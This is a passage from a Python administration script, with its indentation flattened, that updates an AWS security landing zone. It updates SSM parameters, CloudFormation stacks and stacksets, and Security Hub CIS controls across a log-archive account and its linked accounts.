seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_config-groupname')
if do_update(ssm_actions, 'alarms-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_alarms-groupname', ssm_actions['alarms-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['alarms-groupname'] and ssm_actions['alarms-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_alarms-groupname')
cfn = boto3.client('cloudformation',config=boto3_config)
#KMS template
if do_update(stack_actions, 'SECLZ-Cloudtrail-KMS') and seclog_status != Execution.FAIL:
            result = update_stack(cfn, 'SECLZ-Cloudtrail-KMS', stacks, get_params(stack_actions,'SECLZ-Cloudtrail-KMS'))
if result != Execution.NO_ACTION:
seclog_status = result
            if result == Execution.OK:
print("SSM parameter /org/member/KMSCloudtrailKey_arn update", end="")
#response = update_ssm_parameter(cfnssm,'/org/member/KMSCloudtrailKey_arn', response['Parameter']['Value'])
add_tags_parameter(cfnssm, '/org/member/KMSCloudtrailKey_arn')
print(f" [{Status.OK.value}]")
#logshipper lambdas S3 bucket
if do_update(stack_actions, 'SECLZ-LogShipper-Lambdas-Bucket') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-LogShipper-Lambdas-Bucket', stacks, get_params(stack_actions,'SECLZ-LogShipper-Lambdas-Bucket'))
if result != Execution.NO_ACTION:
seclog_status = result
#logshipper lambdas
if do_update(stack_actions, 'SECLZ-LogShipper-Lambdas') and seclog_status != Execution.FAIL:
#packaging lambdas
now = datetime.now().strftime('%d%m%Y')
cloudtrail_lambda=f'CloudtrailLogShipper-{now}.zip'
with ZipFile(cloudtrail_lambda,'w') as zip:
zip.write('LAMBDAS/CloudtrailLogShipper.py','CloudtrailLogShipper.py')
config_lambda=f'ConfigLogShipper-{now}.zip'
with ZipFile(config_lambda,'w') as zip:
zip.write('LAMBDAS/ConfigLogShipper.py','ConfigLogShipper.py')
#update CFT file
if seclog_status != Execution.FAIL:
template = stacks['SECLZ-LogShipper-Lambdas']['Template']
print("Template SECLZ-LogShipper-Lambdas update ", end="")
try:
template = stacks['SECLZ-LogShipper-Lambdas']['Template']
with open(template, "r") as f:
template_body=f.read()
template_body = template_body.replace('##cloudtrailCodeURI##',cloudtrail_lambda).replace('##configCodeURI##',config_lambda)
template = f'EC-lz-logshipper-lambdas-{now}.yml'
with open(template, "w") as f:
f.write(template_body)
print(f" [{Status.OK.value}]")
except FileNotFoundError as err:
print(f" [{Status.FAIL.value}]")
seclog_status = Execution.FAIL
#package stack
print("Template SECLZ-LogShipper-Lambdas package ", end="")
bucket=f'lambda-artefacts-{account_id}'
if seclog_status != Execution.FAIL:
prf=''
if has_profile:
prf = f'--profile {profile}'
with Spinner():
cmd = f"aws cloudformation package --template-file {template} {prf} --s3-bucket {bucket} --output-template-file EC-lz-logshipper-lambdas-{now}.packaged.yml"
cmdarg = shlex.split(cmd)
proc = subprocess.Popen(cmdarg,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output, errors = proc.communicate()
if len(errors) > 0:
print(f" failed. Readon {errors} [{Status.FAIL.value}]")
seclog_status = Execution.FAIL
else:
print(f" [{Status.OK.value}]")
os.remove(template)
os.remove(cloudtrail_lambda)
os.remove(config_lambda)
#updating stack
if seclog_status != Execution.FAIL:
stacks['SECLZ-LogShipper-Lambdas']['Template'] = f'EC-lz-logshipper-lambdas-{now}.packaged.yml'
result = update_stack(cfn, 'SECLZ-LogShipper-Lambdas', stacks, get_params(stack_actions,'SECLZ-LogShipper-Lambdas'))
if result != Execution.NO_ACTION:
seclog_status = result
os.remove(f'EC-lz-logshipper-lambdas-{now}.packaged.yml')
#central buckets
if do_update(stack_actions, 'SECLZ-Central-Buckets') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Central-Buckets', stacks, get_params(stack_actions,'SECLZ-Central-Buckets'))
if result != Execution.NO_ACTION:
seclog_status = result
#password policy
if do_update(stack_actions, 'SECLZ-Iam-Password-Policy') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Iam-Password-Policy', stacks, get_params(stack_actions,'SECLZ-Iam-Password-Policy'))
if result != Execution.NO_ACTION:
seclog_status = result
#cloudtrail SNS
if do_update(stack_actions, 'SECLZ-config-cloudtrail-SNS') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-config-cloudtrail-SNS', stacks, get_params(stack_actions,'SECLZ-config-cloudtrail-SNS'))
if result != Execution.NO_ACTION:
seclog_status = result
#guardduty detector
if do_update(stack_actions, 'SECLZ-Guardduty-detector') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Guardduty-detector', stacks, get_params(stack_actions,'SECLZ-Guardduty-detector'))
if result != Execution.NO_ACTION:
seclog_status = result
#securityhub
if do_update(stack_actions, 'SECLZ-SecurityHub') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-SecurityHub', stacks, get_params(stack_actions,'SECLZ-SecurityHub'))
if result != Execution.NO_ACTION:
seclog_status = result
#cloudtrail notifications
if do_update(stack_actions, 'SECLZ-Notifications-Cloudtrail') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Notifications-Cloudtrail', stacks, get_params(stack_actions,'SECLZ-Notifications-Cloudtrail'))
if result != Execution.NO_ACTION:
seclog_status = result
#cloudwatch logs
if do_update(stack_actions, 'SECLZ-CloudwatchLogs-SecurityHub') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-CloudwatchLogs-SecurityHub', stacks, get_params(stack_actions,'SECLZ-CloudwatchLogs-SecurityHub'))
if result != Execution.NO_ACTION:
seclog_status = result
#stackset Enable-Config-SecurityHub
if do_update(stacksets_actions, 'SECLZ-Enable-Config-SecurityHub-Globally') and seclog_status != Execution.FAIL:
result = update_stackset(cfn, 'SECLZ-Enable-Config-SecurityHub-Globally', stacksets, get_params(stacksets_actions,'SECLZ-Enable-Config-SecurityHub-Globally'))
if result != Execution.NO_ACTION:
seclog_status = result
#stackset Enable-Guardduty-Globally
if do_update(stacksets_actions, 'SECLZ-Enable-Guardduty-Globally') and seclog_status != Execution.FAIL:
result = update_stackset(cfn, 'SECLZ-Enable-Guardduty-Globally', stacksets, get_params(stacksets_actions,'SECLZ-Enable-Guardduty-Globally'))
if result != Execution.NO_ACTION:
seclog_status = result
#securityhub actions
if securityhub_actions and seclog_status != Execution.FAIL:
cfn = boto3.client('securityhub')
print("Enable SecurityHub Multi-region findings", end="")
toggle_securityhub_multiregion_findings(cfn, securityhub_actions['multiregion-findings']['enable'])
#update LZ version
if version and seclog_status != Execution.FAIL:
cfn = boto3.client('ssm')
result=update_ssm_parameter(cfn, '/org/member/SLZVersion', version)
#add tags
result = add_tags_parameter(cfn, '/org/member/SLZVersion')
if result != Execution.NO_ACTION:
seclog_status = result
print("")
print(f"SECLOG account {account_id} update ", end="")
if seclog_status == Execution.FAIL:
print(f"[{Status.FAIL.value}]")
elif seclog_status == Execution.OK:
print(f"[{Status.OK.value}]")
else:
print(f"[{Status.NO_ACTION.value}]")
#update linked account stacks
if seclog_status == Execution.FAIL and len(linked_accounts) > 0:
print("Skipping linked accounts update")
linked_status = Execution.NO_ACTION
else:
if len(accounts['include']) > 0:
linked_accounts = [d for d in accounts['include'] if d != account_id]
for linked in linked_accounts:
if len(accounts['exclude']) > 0 and linked in accounts['exclude']:
print(f"Skipping linked account {linked}")
else:
sts = boto3.client('sts')
assumedRole = sts.assume_role(
RoleArn=f"arn:aws:iam::{linked}:role/AWSCloudFormationStackSetExecutionRole",
RoleSessionName='CloudFormationSession'
)
credentials = assumedRole['Credentials']
accessKey = credentials['AccessKeyId']
secretAccessKey = credentials['SecretAccessKey']
sessionToken = credentials['SessionToken']
print("")
print(f"Updating linked account {linked}")
print("")
linked_status = Execution.NO_ACTION
if ssm_actions:
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
#update SSM parameters
if do_update(ssm_actions, 'seclog-ou') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLogOU', ssm_actions['seclog-ou']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['seclog-ou'] and ssm_actions['seclog-ou']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLogOU')
if do_update(ssm_actions, 'notification-mail') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_notification-mail', ssm_actions['notification-mail']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['notification-mail'] and ssm_actions['notification-mail']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_notification-mail')
if do_update(ssm_actions, 'cloudtrail-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_cloudtrail-groupname', ssm_actions['cloudtrail-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
will_update(stack_actions,'SECLZ-Notifications-Cloudtrail')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['cloudtrail-groupname'] and ssm_actions['cloudtrail-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_cloudtrail-groupname')
if do_update(ssm_actions, 'insight-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_insight-groupname', ssm_actions['insight-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['insight-groupname'] and ssm_actions['insight-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_insight-groupname')
if do_update(ssm_actions, 'guardduty-groupname') and linked_status != Execution.FAIL:
for region in all_regions:
cfn = boto3.client('ssm', aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region)
result=update_ssm_parameter(cfn, '/org/member/SecLog_guardduty-groupname', ssm_actions['guardduty-groupname']['value'], region)
if result != Execution.OK:
will_update(stack_actions,'SECLZ-Guardduty-detector')
if result != Execution.NO_ACTION:
linked_status = result
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
#add tags
if 'tags' in ssm_actions['guardduty-groupname'] and ssm_actions['guardduty-groupname']['tags'] == True:
for region in all_regions:
cfn = boto3.client('ssm', aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region)
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_guardduty-groupname', region)
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
if do_update(ssm_actions, 'securityhub-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_securityhub-groupname', ssm_actions['securityhub-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-CloudwatchLogs-SecurityHub')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['securityhub-groupname'] and ssm_actions['securityhub-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_securityhub-groupname')
if do_update(ssm_actions, 'config-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_config-groupname', ssm_actions['config-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['config-groupname'] and ssm_actions['config-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_config-groupname')
if do_update(ssm_actions, 'alarms-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_alarms-groupname', ssm_actions['alarms-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['alarms-groupname'] and ssm_actions['alarms-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_alarms-groupname')
cfn = boto3.client('cloudformation',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
#password policy
if do_update(stack_actions, 'SECLZ-Iam-Password-Policy') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Iam-Password-Policy', stacks, get_params(stack_actions,'SECLZ-Iam-Password-Policy'))
if result != Execution.NO_ACTION:
linked_status = result
#cloudtrail SNS
if do_update(stack_actions, 'SECLZ-config-cloudtrail-SNS') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-config-cloudtrail-SNS', stacks, get_params(stack_actions,'SECLZ-config-cloudtrail-SNS'))
if result != Execution.NO_ACTION:
linked_status = result
#securityhub
if do_update(stack_actions, 'SECLZ-SecurityHub') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-SecurityHub', stacks, get_params(stack_actions,'SECLZ-SecurityHub'))
if result != Execution.NO_ACTION:
linked_status = result
#cloudtrail notification
if do_update(stack_actions, 'SECLZ-Notifications-Cloudtrail') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Notifications-Cloudtrail', stacks, get_params(stack_actions,'SECLZ-Notifications-Cloudtrail'))
if result != Execution.NO_ACTION:
linked_status = result
#local SNS topic
if do_update(stack_actions, 'SECLZ-local-SNS-topic') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-local-SNS-topic', stacks, get_params(stack_actions,'SECLZ-local-SNS-topic'))
if result != Execution.NO_ACTION:
linked_status = result
#update LZ version
if version and linked_status != Execution.FAIL:
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
result=update_ssm_parameter(cfn, '/org/member/SLZVersion', version)
result=add_tags_parameter(cfn, '/org/member/SLZVersion')
if result != Execution.NO_ACTION:
linked_status = result
print("")
print(f"Linked account {linked} update ", end="")
if linked_status == Execution.FAIL:
print(f"[{Status.FAIL.value}]")
elif linked_status == Execution.OK:
print(f"[{Status.OK.value}]")
else:
print(f"[{Status.NO_ACTION.value}]")
print("")
if seclog_status != Execution.FAIL and linked_status != Execution.FAIL:
print("")
print(f"Adding stacks to Stacksets from SECLOG {account_id} ")
print("")
cfn = boto3.client('cloudformation',config=boto3_config)
#stackset add stack SECLZ-Enable-Config-SecurityHub-Globally
if do_add_stack(stacksets_actions, 'SECLZ-Enable-Config-SecurityHub-Globally'):
stacksetacc = linked_accounts.copy()
stacksetacc.append(get_account_id())
result = add_stack_to_stackset(cfn, 'SECLZ-Enable-Config-SecurityHub-Globally', stacksetacc, stacksets_actions['SECLZ-Enable-Config-SecurityHub-Globally']['deploy'])
if result != Execution.NO_ACTION:
seclog_status = result
#stackset add stack SECLZ-Enable-Guardduty-Globally
if do_add_stack(stacksets_actions, 'SECLZ-Enable-Guardduty-Globally') and seclog_status != Execution.FAIL:
stacksetacc = linked_accounts.copy()
stacksetacc.append(get_account_id())
result = add_stack_to_stackset(cfn, 'SECLZ-Enable-Guardduty-Globally', stacksetacc, stacksets_actions['SECLZ-Enable-Guardduty-Globally']['deploy'])
if result != Execution.NO_ACTION:
seclog_status = result
print("")
print(f"Adding stacks to Stacksets from SECLOG {account_id} ", end="")
if seclog_status == Execution.FAIL:
print(f"[{Status.FAIL.value}]")
elif seclog_status == Execution.OK:
print(f"[{Status.OK.value}]")
else:
print(f"[{Status.NO_ACTION.value}]")
print("")
else:
print("")
print(f"Skipping adding stacks to Stacksets from SECLOG {account_id} ")
print("")
#cis controls SECLOG
if not null_empty(manifest, 'cis') and seclog_status != Execution.FAIL:
seclog_status = update_cis_controls(rules=cis_actions,accountid=account_id)
#cis controls linked accounts
if seclog_status == Execution.FAIL and len(linked_accounts) > 0 and null_empty(manifest, 'cis'):
print("Skipping linked accounts CIS controls update")
linked_status = Execution.NO_ACTION
else:
if len(accounts['include']) > 0:
linked_accounts = [d for d in accounts['include'] if d != account_id]
for linked in linked_accounts:
if len(accounts['exclude']) > 0 and linked in accounts['exclude']:
print(f"Skipping linked account {linked}")
else:
sts = boto3.client('sts')
assumedRole = sts.assume_role(
RoleArn=f"arn:aws:iam::{linked}:role/AWSCloudFormationStackSetExecutionRole",
RoleSessionName='CloudFormationSession'
)
credentials = assumedRole['Credentials']
accessKey = credentials['AccessKeyId']
secretAccessKey = credentials['SecretAccessKey']
sessionToken = credentials['SessionToken']
if not null_empty(manifest, 'cis') and linked_status != Execution.FAIL:
linked_status = update_cis_controls(
rules=cis_actions,
accountid=linked,
accessKey=accessKey,
secretAccessKey=secretAccessKey,
sessionToken=sessionToken
)
print("")
print(f"####### AWS Landing Zone update script finished. Executed in {time.time() - start_time} seconds")
print("#######")
print("")
def usage():
"""
This function prints the script usage
"""
print('Usage:')
print('')
print('python EC-Update-LZ.py -m <manifest> [-s <seclogprofile>] [-o <orgprofile>] [-v]')
print('')
print(' Provide ')
    print(' -m --manifest : The manifest for the LZ update')
print(' -s --seclog : The AWS profile of the SECLOG account - optional')
print(' -o --org : The AWS ID of the Organisation account - optional')
print(' -v --verbose : Debug mode - optional')
def get_account_id(Force = False):
"""
    This function gets the ID of the account defined in the profile
    :param Force: flag to force the retrieval of the account ID
:return: a string with the account id
"""
global account_id
if account_id == '' or Force == True:
sts = boto3.client('sts')
try:
response = sts.get_caller_identity()
account_id = response['Account']
except ClientError as error:
if error.response['Error']['Code'] == 'AccessDenied':
print(f"Access denied getting account id [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
else:
raise error
return account_id
def get_linked_accounts():
"""
Function to retrieve the Linked accounts from a SECLOG account
:return: list with linked account details
"""
linked_accounts = []
accountId = get_account_id()
client = boto3.client('guardduty')
response = client.list_detectors()
    if response['DetectorIds'] and response['DetectorIds'][0] != '':
data = client.list_members(DetectorId=response['DetectorIds'][0])
for member in data['Members']:
if member['RelationshipStatus'] == 'Enabled':
linked_accounts.append(member['AccountId'])
return linked_accounts
def is_seclog():
"""
Function that checks if the account is a seclog account
:return: true or false
"""
client = boto3.client('ssm')
seclog_account_id = get_account_id()
response = client.get_parameter(Name='/org/member/SecLogMasterAccountId')
    if 'Value' not in response['Parameter'] or seclog_account_id != response['Parameter']['Value']:
return False
return True
def null_empty(dict, key):
"""
    Function that checks whether a key is missing from the dict
    :return: True if the key is not present, False otherwise
"""
if key in dict:
return False
return True
def do_update(dict, key):
"""
    Function that checks whether the key exists in the dict and its 'update' flag is set to True
    :return: True or False
"""
if not null_empty(dict, key) and 'update' in dict[key] and dict[key]['update'] == True:
return True
else: return False
def do_add_stack(dict, key):
"""
    Function that checks whether the key exists in the dict and its 'deploy' value is set
    :return: True or False
"""
if not null_empty(dict, key) and 'deploy' in dict[key] and dict[key]['deploy']:
return True
else: return False
def will_update(dict, key):
"""
Function that sets a stack to be updated
"""
if not null_empty(dict, key) and 'update' in dict[key] and dict[key]['update'] == False:
dict[key]['update'] = True
def merge_tags(list1, list2):
"""
Function to merge two list of tags
"""
res = {}
output = []
for item in list1:
res[item['Key']] = item['Value']
for item in list2:
res[item['Key']] = item['Value']
for item in res:
output.append({"Key": item, "Value": res[item]})
return output
def merge_params(list1, list2):
"""
Function to merge two list of params
"""
res = {}
output = []
for item in list1:
res[item['ParameterKey']] = item['ParameterValue']
for item in list2:
res[item['ParameterKey']] = item['ParameterValue']
for item in res:
output.append({"ParameterKey": item, "ParameterValue": res[item]})
return output
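# Helper: return the 'params' list configured for the given action key, or an empty list if none is set.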
def get_params(actions, key):
return actions[key]['params'] if key in actions and 'params' in actions[key] else []
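# Apply the globally defined tags to an existing SSM parameter; returns an Execution status.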
def add_tags_parameter(client,parameter,region=None):
global tags
if region:
print(f"Adding tags to SSM parameter {parameter} [{region}] ", end="")
else:
print(f"Adding tags to SSM parameter {parameter} ", end="")
try:
response = client.get_parameter(Name=parameter)
except Exception as err:
print(f"failed, reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
try:
response=client.add_tags_to_resource(
ResourceType='Parameter',
ResourceId=parameter,
Tags=tags)
print(f"[{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed, reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
def update_ssm_parameter(client, parameter, value, region=None):
"""
Function used to update an SSM parameter if the value is different
    :parameter: parameter name
:value: the value to be updated
:return: execution status
"""
exists = True
if region:
print(f"SSM parameter {parameter} update [{region}] ", end="")
else:
print(f"SSM parameter {parameter} update ", end="")
try:
response = client.get_parameter(Name=parameter)
except Exception as err:
exists=False
try:
if not exists or ('Value' in response['Parameter'] and value != response['Parameter']['Value']):
response = client.put_parameter(
Name=parameter,
Value=value,
Type='String',
                Overwrite=True)
if response['Version']:
print(f"[{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
print(f"[{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
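# Recursively page through describe_standards_controls until no NextToken remains, returning every control.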
def get_controls(client, region, sub_arn, NextToken=None):
controls = client.describe_standards_controls(
NextToken=NextToken,
StandardsSubscriptionArn=sub_arn) if NextToken else client.describe_standards_controls(
StandardsSubscriptionArn=sub_arn)
if ('NextToken' in controls):
return controls['Controls'] + get_controls(client, region, sub_arn, NextToken=controls['NextToken'])
else:
return controls['Controls']
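# Create or delete the Security Hub cross-region finding aggregator, depending on the 'enable' flag.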
def toggle_securityhub_multiregion_findings(client, enable=True):
response0 = client.list_finding_aggregators()
if len(response0['FindingAggregators']) == 0 and enable:
try:
response = client.create_finding_aggregator(
RegionLinkingMode='ALL_REGIONS'
)
print(f" [{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
elif len(response0['FindingAggregators']) == 1 and enable == False:
try:
response = client.delete_finding_aggregator(
FindingAggregatorArn=response0['FindingAggregators'][0]['FindingAggregatorArn']
)
print(f" [{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
else:
print(f" [{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
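# Enable the CIS and AWS Foundational Security Best Practices standards in every region, then enable or disable individual controls according to the manifest rules.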
def update_cis_controls(rules, accountid,
accessKey=None,
secretAccessKey=None,
sessionToken=None):
global all_regions
print(f"CIS controls update [{accountid}]", end="")
try:
with Spinner():
#enable all rules
failed_regions = []
for region in all_regions:
try:
client = boto3.client('securityhub',aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region
)
client.batch_enable_standards(
StandardsSubscriptionRequests=[
{
'StandardsArn': "arn:aws:securityhub:::ruleset/cis-aws-foundations-benchmark/v/1.2.0",
},
]
)
client.batch_enable_standards(
StandardsSubscriptionRequests=[
{
'StandardsArn': f"arn:aws:securityhub:{region}::standards/aws-foundational-security-best-practices/v/1.0.0",
},
]
)
except Exception as err:
failed_regions.append(region)
if len(failed_regions) > 0:
print(f"failed. Reason Account is not subscribed to AWS Security Hub on the following regions {failed_regions} [{Status.FAIL.value}]")
return Execution.FAIL
enabled_rules = { key:value for (key,value) in rules.items() if value['disabled'] == False}
disabled_rules = { key:value for (key,value) in rules.items() if value['disabled'] == True}
#enabled rules
for rule,value in enabled_rules.items():
regions = value['regions'] if 'regions' in value and len(value['regions']) > 0 else all_regions
if 'exclusions' in value:
regions = [d for d in regions if d not in value['exclusions']]
for region in regions:
client = boto3.client('securityhub',aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region
)
stds = client.get_enabled_standards()
for std in stds['StandardsSubscriptions']:
controls = []
available_controls = get_controls(client, region, std['StandardsSubscriptionArn'])
if 'checks' not in value:
controls = [d for d in available_controls if rule in d['StandardsControlArn'] ]
else:
for check in value['checks']:
controls.extend([d for d in available_controls if f"{rule}/{check}" in d['StandardsControlArn'] ])
for control in controls:
try:
client.update_standards_control(
StandardsControlArn=control['StandardsControlArn'],
ControlStatus='ENABLED'
)
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
#disabled rules
for rule,value in disabled_rules.items():
regions = value['regions'] if 'regions' in value and len(value['regions']) > 0 else all_regions
if 'exclusions' in value:
regions = [d for d in regions if d not in value['exclusions']]
for region in regions:
client = boto3.client('securityhub',aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region
)
stds = client.get_enabled_standards()
for std in stds['StandardsSubscriptions']:
available_controls = get_controls(client, region, std['StandardsSubscriptionArn'])
controls = []
if 'checks' not in value:
controls = [d for d in available_controls if rule in d['StandardsControlArn'] ]
else:
for check in value['checks']:
controls.extend([d for d in available_controls if f"{rule}/{check}" in d['StandardsControlArn'] ])
for control in controls:
try:
response=client.update_standards_control(
StandardsControlArn=control['StandardsControlArn'],
ControlStatus='DISABLED',
DisabledReason='Managed by Cloud Broker Team' if 'disabled-reason' not in value else value['disabled-reason'],
)
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
print(f" [{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
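# Keep only the parameters that are actually declared in the template's 'Parameters' section.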
def validate_params(params, template):
new_params = []
dict_template = load_yaml(template)
return [elem for elem in params if elem['ParameterKey'] in dict_template['Parameters']]
def update_stack(client, stack, templates, params=[]):
"""
Function that updates a stack defined in the parameters
:stack: The stack name
    :templates: dict holding the CloudFormation template details
    :params: parameters to be passed to the stack
    :return: Execution status
"""
global tags
template = templates[stack]['Template']
capabilities=[]
print(f"Stack {stack} update ", end="")
try:
with open(template, "r") as f:
template_body=f.read()
response = client.describe_stacks(StackName=stack)
except FileNotFoundError as err:
print(f"\033[2K\033[Stack template file not found : {err.strerror} [{Status.FAIL.value}]")
return Execution.FAIL
except ClientError as err:
print(f"\033[2K\033[1GStack {stack} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
if 'Parameters:' in template_body:
if not null_empty(templates[stack], 'Params'):
try:
with open(templates[stack]['Params']) as f:
params = json.load(f)
except FileNotFoundError as err:
print(f"\033[2K\033[1GParameter file not found : {err.strerror} [{Status.FAIL.value}]")
                return Execution.FAIL
except json.decoder.JSONDecodeError as err:
print(f"\033[2K\033[1GParameter file problem : {err.strerror} [{Status.FAIL.value}]")
                return Execution.FAIL
elif not null_empty(response['Stacks'][0], 'Parameters'):
params = merge_params(response['Stacks'][0]['Parameters'], params)
if not null_empty(response['Stacks'][0], 'Capabilities'):
capabilities = response['Stacks'][0]['Capabilities']
    apply_tags = tags
    if not null_empty(response['Stacks'][0], 'Tags'):
        apply_tags = merge_tags(response['Stacks'][0]['Tags'], tags)
if response['Stacks'][0]['StackStatus'] not in ('CREATE_COMPLETE', 'UPDATE_COMPLETE','UPDATE_ROLLBACK_COMPLETE'):
print(f"Cannot update stack {stack}. Current status is : {response['Stacks'][0]['StackStatus']} [{Status.FAIL.value}]")
return Execution.FAIL
print("in progress ", end="")
with Spinner():
try:
client.update_stack(
StackName=stack,
TemplateBody=template_body,
Parameters=validate_params(params, template_body),
Capabilities=capabilities,
Tags=apply_tags)
updated=False
while updated == False:
try:
time.sleep(1)
response = client.describe_stacks(StackName=stack)
if 'COMPLETE' in response['Stacks'][0]['StackStatus'] :
print(f"\033[2K\033[1GStack {stack} update [{Status.OK.value}]")
updated=True
break
elif 'FAILED' in response['Stacks'][0]['StackStatus'] or 'ROLLBACK' in response['Stacks'][0]['StackStatus'] :
print(f"\033[2K\033[1GStack {stack} update failed. Reason {response['Stacks'][0]['StackStatusReason']} [{Status.FAIL.value}]")
return Execution.FAIL
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
else:
raise err
return Execution.OK
except ClientError as err:
if err.response['Error']['Code'] == 'AmazonCloudFormationException':
print(f"\033[2K\033[1GStack {stack} not found : {err.response['Error']['Message']} [{Status.FAIL.value}]")
elif err.response['Error']['Code'] == 'ValidationError' and err.response['Error']['Message'] == 'No updates are to be performed.':
print(f"\033[2K\033[1GStack {stack} update [{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
else:
print(f"\033[2K\033[1GStack {stack} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
def add_stack_to_stackset(client, stackset, accounts, regions):
"""
    Function that adds stack instances to the stackset defined in the parameters
    :stackset: The stackset name
    :accounts: accounts in which the stack instances are created
    :regions: regions in which the stack instances are created
    :return: Execution status
"""
print(f"Adding stacks to StackSet {stackset} ", end="")
response = client.describe_stack_set(StackSetName=stackset)
    if response['StackSet']['Status'] != 'ACTIVE':
